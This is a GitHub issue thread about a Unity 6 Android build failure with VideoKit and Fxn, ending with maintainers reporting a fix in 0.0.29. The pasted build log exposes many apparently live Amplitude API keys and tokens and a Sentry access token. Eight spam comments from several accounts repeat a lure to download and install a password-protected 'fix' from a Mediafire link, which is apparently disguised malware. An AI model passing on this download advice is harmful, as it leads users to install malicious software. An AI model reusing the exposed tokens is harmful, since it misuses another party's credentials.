### ISSUE TITLE
Unable to build Android app with Firebase 12.2.0 + VideoKit 0.0.21 + Fxn 0.0.27 using Unity 6

### ISSUE THREAD

**Issue by thesanketkale** [fxnai/fxn3d#5]
I am getting a build time error (error log attached) when building an Android app with VideoKit 0.0.21 and Firebase version 12.2.0 on Unity 6. The VideoKit v0.0.19 works in the same setup, but not the latest one.

Unity version: 6000.0.15f1
VideoKit version: 0.0.21
Fxn version: 0.0.27
Build Target: Android
OS: Windows 11

Build error log:

```
CommandInvokationFailure: Gradle build failed. 
C:\Unity\Hub\Editor\6000.0.15f1\Editor\Data\PlaybackEngines\AndroidPlayer\OpenJDK\bin\java.exe -classpath "C:\Unity\Hub\Editor\6000.0.15f1\Editor\Data\PlaybackEngines\AndroidPlayer\Tools\gradle\lib\gradle-launcher-8.4.jar" org.gradle.launcher.GradleMain "-Dorg.gradle.jvmargs=-Xmx4096m" "assembleRelease" 

Environment Variables:
SHIM_MCCOMPAT = 0x810000001
PROCESSOR_ARCHITECTURE = AMD64
AMPLITUDE_API_KEY_YELLOWBUCKET_DEV = 48835b4d1f5e342aefe5f016324d296a
ANDROID_NDK_ROOT = C:\Unity\Hub\Editor\6000.0.15f1\Editor\Data\PlaybackEngines\AndroidPlayer\NDK
DriverData = C:\Windows\System32\Drivers\DriverData
USERDOMAIN = TDPL-LT-02
CommonProgramFiles(x86) = C:\Program Files (x86)\Common Files
COMPUTERNAME = TDPL-LT-02
DEBUG_ENV_VAR = UnityHub
LOGONSERVER = \\TDPL-LT-02
AMPLITUDE_TOKEN_GREENBUCKET_PROD = ZpUcbAdZXJYzNSoHsAWtL_s_JppwWid9
PUBLIC = C:\Users\Public
ProgramData = C:\ProgramData
SESSIONNAME = Console
AMPLITUDE_TOKEN_YELLOWBUCKET_PROD = UYDQtPOw83dIfVy3SrW5oMyo7ru4PRkV
NVIDIAWHITELISTED = 0x01
RegionCode = APJ
APPDATA = C:\Users\Sanket\AppData\Roaming
SystemRoot = C:\WINDOWS
windir = C:\WINDOWS
AMPLITUDE_API_KEY_REDBUCKET_DEV = 46b8b46515e7632fc42a504b72e05fd0
ProgramFiles(x86) = C:\Program Files (x86)
ProgramW6432 = C:\Program Files
OS = Windows_NT
PROCESSOR_IDENTIFIER = Intel64 Family 6 Model 140 Stepping 1, GenuineIntel
HOMEPATH = \Users\Sanket
FPS_BROWSER_USER_PROFILE_STRING = Default
AMPLITUDE_TOKEN_REDBUCKET_DEV = U4PSN7S7PuYVRODivvdcFwbu8R6IHGqa
CHROME_CRASHPAD_PIPE_NAME = \\.\pipe\crashpad_12824_RJQONIZHMNZVCNTZ
PROCESSOR_LEVEL = 6
platformcode = KV
CommonProgramFiles = C:\Program Files\Common Files
ZES_ENABLE_SYSMAN = 1
JAVA_HOME = C:\Unity\Hub\Editor\6000.0.15f1\Editor\Data\PlaybackEngines\AndroidPlayer\OpenJDK
USERDOMAIN_ROAMINGPROFILE = TDPL-LT-02
TEMP = C:\Users\Sanket\AppData\Local\Temp
CommonProgramW6432 = C:\Program Files\Common Files
AMPLITUDE_TOKEN_YELLOWBUCKET_DEV = wKi8foVigDditGFvmZewRFWsEbX9Y0YO
AMPLITUDE_API_KEY_GREENBUCKET_DEV = 3ded2a762163603391a425f688f990c8
AMPLITUDE_API_KEY_REDBUCKET_PROD = ca12bb461ea96f9bdf5df4ded7d52994
HOMEDRIVE = C:
AMPLITUDE_API_KEY_STAGING = 83ee04fccc67e4fcc7dd527c4c6f1e21
USERNAME = Sanket
OneDrive = C:\Users\Sanket\OneDrive
AMPLITUDE_API_KEY_YELLOWBUCKET_PROD = e03a9bbe92dc38a88cdb068d24c65b46
PATHEXT = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
AMPLITUDE_TOKEN_REDBUCKET_PROD = jTIgKs5KTZOjiqEEVdZFbgo_VRhABduL
OculusBase = C:\Program Files\Oculus\
NUMBER_OF_PROCESSORS = 8
AMPLITUDE_TOKEN_GREENBUCKET_DEV = 84H2gMm_FJzhr3mBaX1lM1JVukmCM7d9
AMPLITUDE_DEPLOYMENT_KEY_RED_BUCKET_DEV = client-wbjHYrmeSR87GmWOE7LDpf7sUySOIKHm
PSModulePath = C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
AMPLITUDE_API_KEY_GREENBUCKET_PROD = c86fea37a9e1d3f0878b96e15b111c7c
ComSpec = C:\WINDOWS\system32\cmd.exe
ORIGINAL_XDG_CURRENT_DESKTOP = undefined
PROCESSOR_REVISION = 8c01
AMPLITUDE_DEPLOYMENT_KEY_RED_BUCKET_PROD = client-zH8Y7OK1i331EKuG77C6UxN8ygcM6LzS
TMP = C:\Users\Sanket\AppData\Local\Temp
SystemDrive = C:
EFC_2856 = 1
OnlineServices = Online Services
AMPLITUDE_API_KEY = 28f3cae0b33b8b3702120c9ed1a935aa
FPS_BROWSER_APP_PROFILE_STRING = Internet Explorer
SENTRY_ACCESS_TOKEN = 3df78d9e53f8456aa90fbae044ce1a6261421ab1d0014674bc2e933477289017
ALLUSERSPROFILE = C:\ProgramData
Path = C:\Program Files (x86)\Common Files\Oracle\Java\java8path;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files\PlasticSCM5\server;C:\Program Files\PlasticSCM5\client;C:\ffmpeg\bin;C:\Program Files\Oculus\Support\oculus-runtime;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0\;C:\windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Program Files\Amazon\AWSCLIV2\;C:\Program Files\Git\cmd;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\150\Tools\Binn\;C:\Users\Sanket\AppData\Local\Microsoft\WindowsApps;C:\Program Files (x86)\WinMerge;C:\Program Files\dotnet\;C:\WINDOWS\system32;C:\WINDOWS;C:\WIND;C:\Program Files\Docker\Docker\resources\bin;C:\wamp64\bin\apache\apache2.4.54.2\bin;D:\Repositories\git\emscripten-core\emsdk;C:\Program Files\Nuget;C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin;C:\Program Files\nodejs\;C:\wamp64\bin\php\php8.0.26;C:\ProgramData\ComposerSetup\bin;%JAVA_HOME%\bin;C:\Users\Sanket\AppData\Local\Microsoft\WindowsApps;C:\Users\Sanket\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\Sanket\AppData\Local\GitHubDesktop\bin;C:\Users\Sanket\AppData\Local\Programs\Microsoft VS Code\bin;C:\Program Files\Java\jdk1.8.0_202\bin;C:\Program Files\Nuget;C:\Users\Sanket\AppData\Local\Android\Sdk\platform-tools;C:\Users\Sanket\AppData\Roaming\npm;C:\Users\Sanket\AppData\Roaming\Composer\vendor\bin;C:\Users\Sanket\.dotnet\tools
ProgramFiles = C:\Program Files
LOCALAPPDATA = C:\Users\Sanket\AppData\Local
USERPROFILE = C:\Users\Sanket
WOOTRIC_CLIENT_TOKEN = NPS-aa8be4c3


stderr[

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':unityLibrary:configureCMakeRelWithDebInfo[arm64-v8a]'.
> [CXX1211] D:\Workbench\Unity\2023\UnityApp-6\Library\Bee\Android\Prj\IL2CPP\Gradle\unityLibrary\src\main\cpp\CMakeLists.txt release|arm64-v8a : Library is a shared library with a statically linked STL and cannot be used with any library using the STL [//fxn/Function]

* Try:
> Run with --stacktrace option to get the stack trace.
> Run with --info or --debug option to get more log output.
> Run with --scan to get full insights.
> Get more help at https://help.gradle.org.

BUILD FAILED in 11s
]
stdout[

> Configure project :unityLibrary
Variant 'debug', will keep symbols in binaries for:
  'libunity.so'
  'libil2cpp.so'
  'libmain.so'
Variant 'release', symbols will be stripped from binaries.

> Configure project :launcher
Variant 'debug', will keep symbols in binaries for:
  'libunity.so'
  'libil2cpp.so'
  'libmain.so'
Variant 'release', symbols will be stripped from binaries.

> Configure project :unityLibrary:FirebaseApp.androidlib
WARNING: minSdkVersion (24) is greater than targetSdkVersion (9) for variant "debug". Please change the values such that minSdkVersion is less than or equal to targetSdkVersion.
WARNING: minSdkVersion (24) is greater than targetSdkVersion (9) for variant "release". Please change the values such that minSdkVersion is less than or equal to targetSdkVersion.

> Task :unityLibrary:preBuild UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:preBuild UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:preBuild UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:preBuild UP-TO-DATE
> Task :launcher:preBuild UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:preReleaseBuild UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:preReleaseBuild UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:preReleaseBuild UP-TO-DATE
> Task :unityLibrary:preReleaseBuild UP-TO-DATE
> Task :launcher:preReleaseBuild UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:writeReleaseAarMetadata UP-TO-DATE
> Task :unityLibrary:writeReleaseAarMetadata UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:writeReleaseAarMetadata UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:writeReleaseAarMetadata UP-TO-DATE
> Task :launcher:javaPreCompileRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:generateReleaseResValues UP-TO-DATE
> Task :unityLibrary:generateReleaseResValues UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:generateReleaseResValues UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:generateReleaseResValues UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:generateReleaseResources UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:generateReleaseResources UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:generateReleaseResources UP-TO-DATE
> Task :unityLibrary:generateReleaseResources UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:packageReleaseResources UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:packageReleaseResources UP-TO-DATE
> Task :unityLibrary:packageReleaseResources UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:packageReleaseResources UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:extractDeepLinksRelease UP-TO-DATE
> Task :unityLibrary:extractDeepLinksRelease UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:extractDeepLinksRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:extractDeepLinksRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:processReleaseManifest UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:processReleaseManifest UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:processReleaseManifest UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:compileReleaseLibraryResources UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:compileReleaseLibraryResources UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:compileReleaseLibraryResources UP-TO-DATE
> Task :unityLibrary:compileReleaseLibraryResources UP-TO-DATE
> Task :unityLibrary:parseReleaseLocalResources UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:parseReleaseLocalResources UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:generateReleaseRFile UP-TO-DATE
> Task :unityLibrary:generateReleaseRFile UP-TO-DATE
> Task :unityLibrary:javaPreCompileRelease UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:javaPreCompileRelease UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:compileReleaseJavaWithJavac NO-SOURCE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:bundleLibCompileToJarRelease UP-TO-DATE
> Task :unityLibrary:processReleaseJavaRes UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:bundleLibRuntimeToJarRelease UP-TO-DATE
> Task :unityLibrary:extractProguardFiles UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:processReleaseJavaRes NO-SOURCE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:createFullJarRelease UP-TO-DATE
> Task :unityLibrary:prepareLintJarForPublish UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:extractProguardFiles UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:generateReleaseLintModel UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:prepareLintJarForPublish UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseJniLibFolders UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseNativeLibs NO-SOURCE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:stripReleaseDebugSymbols NO-SOURCE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:copyReleaseJniLibsProjectAndLocalJars UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:extractDeepLinksForAarRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:parseReleaseLocalResources UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:generateReleaseRFile UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:javaPreCompileRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:compileReleaseJavaWithJavac NO-SOURCE
> Task :unityLibrary:xrmanifest.androidlib:bundleLibCompileToJarRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:bundleLibRuntimeToJarRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:processReleaseJavaRes NO-SOURCE
> Task :unityLibrary:xrmanifest.androidlib:createFullJarRelease UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:extractProguardFiles UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:generateReleaseLintModel UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:prepareLintJarForPublish UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:mergeReleaseJniLibFolders UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:mergeReleaseNativeLibs NO-SOURCE
> Task :unityLibrary:xrmanifest.androidlib:stripReleaseDebugSymbols NO-SOURCE
> Task :unityLibrary:xrmanifest.androidlib:copyReleaseJniLibsProjectAndLocalJars UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:extractDeepLinksForAarRelease UP-TO-DATE
> Task :unityLibrary:processReleaseManifest
> Task :unityLibrary:FirebaseApp.androidlib:parseReleaseLocalResources UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:generateReleaseRFile UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:javaPreCompileRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:compileReleaseJavaWithJavac NO-SOURCE
> Task :unityLibrary:FirebaseApp.androidlib:bundleLibCompileToJarRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:bundleLibRuntimeToJarRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:processReleaseJavaRes NO-SOURCE
> Task :unityLibrary:FirebaseApp.androidlib:createFullJarRelease UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:extractProguardFiles UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:generateReleaseLintModel UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:prepareLintJarForPublish UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseJniLibFolders UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseNativeLibs NO-SOURCE
> Task :unityLibrary:FirebaseApp.androidlib:stripReleaseDebugSymbols NO-SOURCE
> Task :unityLibrary:FirebaseApp.androidlib:copyReleaseJniLibsProjectAndLocalJars UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:extractDeepLinksForAarRelease UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:extractReleaseAnnotations UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:extractReleaseAnnotations UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:extractReleaseAnnotations UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseGeneratedProguardFiles UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseGeneratedProguardFiles UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:mergeReleaseGeneratedProguardFiles UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseConsumerProguardFiles UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseConsumerProguardFiles UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseShaders UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:mergeReleaseConsumerProguardFiles UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:compileReleaseShaders NO-SOURCE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:generateReleaseAssets UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseShaders UP-TO-DATE
> Task :launcher:checkReleaseAarMetadata UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:compileReleaseShaders NO-SOURCE
> Task :unityLibrary:FirebaseApp.androidlib:generateReleaseAssets UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:packageReleaseAssets UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:packageReleaseAssets UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:mergeReleaseShaders UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:prepareReleaseArtProfile UP-TO-DATE
> Task :launcher:generateReleaseResValues UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:prepareReleaseArtProfile UP-TO-DATE
> Task :unityLibrary:com.voxelbusters.essentialkit.androidlib:mergeReleaseJavaResource UP-TO-DATE
> Task :unityLibrary:xrmanifest.androidlib:compileReleaseShaders NO-SOURCE
> Task :unityLibrary:xrmanifest.androidlib:generateReleaseAssets UP-TO-DATE
> Task :unityLibrary:FirebaseApp.androidlib:mergeReleaseJavaResource UP-TO-DATE
><message truncated>
```

What am I missing here? How can I solve this?

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by olokobayusuf** [comment]
Hey @thesanketkale , @SimonDarksideJ: can either of you share a repro project? It seems that fixing this issue might not be as straightforward as I thought. We'll need a repro to test with, and to confirm that a fix works.

**Comment by SimonDarksideJ** [comment]
No need for a sample project, replication is VERY simple (just re-tested to be sure)

1. Create a new Unity 6 project
2. Set the platform to Android (since this is an Android Gradle build issue)
3. Change the Android SDK version to 30+ (because Unity still thinks it is 1993 with SDK 23)
4. Add VideoKit according to the instructions on GitHub - V0.21
5. Configure VideoKit ID
6. Connect a device
7. Build and Run
8. See error

![image](https://github.com/user-attachments/assets/b0435895-876a-470d-9518-efbaa32cc018)

Issue even exists in a blank project, not even using the asset in a scene.

**Comment by olokobayusuf** [comment]
@SimonDarksideJ yup just confirmed, Unity 6 can repro in an empty project.

**Comment by olokobayusuf** [comment]
This issue seems to affect Unity 6 and 2023, but not 2022.

**Comment by olokobayusuf** [comment]
This has been fixed in 0.0.29. VideoKit will be updated with the fix later today or tomorrow.
